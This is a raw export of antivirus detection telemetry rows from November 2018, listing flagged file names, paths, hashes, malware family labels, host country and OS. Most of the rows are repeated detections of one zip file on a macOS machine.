  Row(detection=Row(filename='patcher.exe', filepath='D:\\Installer\\Sketchup2015\\SketchUp Pro 2015 v15.2.687 (x86)  & v15.2.685 (x64)\\SketchUp Pro 2015 v15.2.687 (32-Bit)\\Patcher.exe', filesize=320000, name='W32/Ramnit.C.#M1.#R1'), hash='214ebfd2cb0da5ca9489b715f78aa5d3e48c03c472e533f13686c3991f6cdb69', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:YFNxkgtW8keHDuRG.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T01:44:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='patcher.exe', filepath='D:\\Installer\\Sketchup2015\\SketchUp Pro 2015 v15.2.687 (x86)  & v15.2.685 (x64)\\SketchUp Pro 2015 v15.2.687 (32-Bit)\\Patcher.exe', filesize=320000, name='W32/Ramnit.C.#M1.#R1'), hash='214ebfd2cb0da5ca9489b715f78aa5d3e48c03c472e533f13686c3991f6cdb69', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:YFNxkgtW8keHDuRG.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T01:44:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='patcher.exe', filepath='D:\\Installer\\Sketchup2015\\SketchUp Pro 2015 v15.2.687 (x86)  & v15.2.685 (x64)\\SketchUp Pro 2015 v15.2.687 (32-Bit)\\Patcher.exe', filesize=320000, name='W32/Ramnit.C.#M1.#R1'), hash='214ebfd2cb0da5ca9489b715f78aa5d3e48c03c472e533f13686c3991f6cdb69', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:YFNxkgtW8keHDuRG.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T01:44:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111512-d9581619', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a60bc76\\AVSCAN-20181104-105944-22245E46\\AVSCAN-20181104-111512-D9581619', filesize=1544000, name='PUA/InstallCore.#M1.#R1'), hash='21fecdb50061690e6b36b8c19e72a9dc7f59bc25ff5c3b2c5ff0203fc42665ea', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:15:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='devcon.exe', filepath='C:\\Program Files\\PowerISO\\devcon.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='22956673e55f57557f4b8f91685a00e7fb646f87e758a3e519a1429be7289f90', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:vDT64t5uJEikjC39.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=37096, timestamp='2018-11-04T00:13:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:51:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:59:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:18:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:26:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:14:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:40:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:14:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:53:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:30:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:14:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:55:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:26:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:53:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:43:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:57:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:04:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:50:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:11:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:45:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:21:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:00:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:58:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:26:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:33:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:05:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:24:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:32:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:39:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:03:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:50:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:22:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:43:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:33:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:58:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:18:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:03:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:23:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:13:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:36:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:41:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:41:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:40:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:03:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:25:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:49:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:45:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:32:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:49:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:58:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:29:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:29:28Z'), dt=datetime.date(2018, 11, 4)),
